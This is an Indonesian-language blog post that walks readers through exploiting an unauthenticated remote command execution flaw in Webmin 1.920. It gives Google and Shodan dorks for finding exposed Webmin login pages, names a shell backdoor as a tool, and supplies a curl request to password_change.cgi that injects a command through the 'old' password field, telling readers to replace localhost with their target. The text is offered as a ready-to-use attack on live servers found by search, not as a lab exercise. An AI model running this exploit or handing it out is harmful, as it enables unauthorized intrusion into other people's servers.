Ad Unit (Iklan) BIG

Webmin unauthenticated RCE

Post a Comment

-
Hai sobat.
Saya ikal,
Disini saya akan share sesuatu.
-

Version : 1.920

langsung saja.
Bahan : 
- termux
- Shell backdoor
- dork : 
Google dork : 
intitle:Login to Webmin
Shodan dork : 
html:webmin
http.title:"Login to Webmin"

Anggep ae gw dah ada target.
1. Dorking
Kalian dorking dengan dork diatas. Jika sudah dapet target kita lanjut ketahap kedua.

2. Eksekusi
Karena disini saya menggunakan hp, jadi saya lakukan via curl lewat termux.

Command : 

$apt update && apt upgrade && pkg install curl
$curl https://localhost/password_change.cgi -H "Content-Type: application/x-www-form-urlencoded" --data "user=root&pam=1&expired=2&old=memek|COMMAND&new1=buyaoxiedaopocli&new2=buyaoxiedaopocli"
 
Note : ganti https://localhost/ dengan target kalian.

Jika result atau vuln, result dari curl tersebut akan menampilkan hasil dari command yang kalian masukan tadi.


Thanks
See u
Haikal_
Hai sobat, Saya ikal. Disini kalian bisa learning mengenai sesuatu dari setiap artikel yang saya buat :D.

Related Posts

Post a Comment

Dapatkan Notifikasi Dengan Email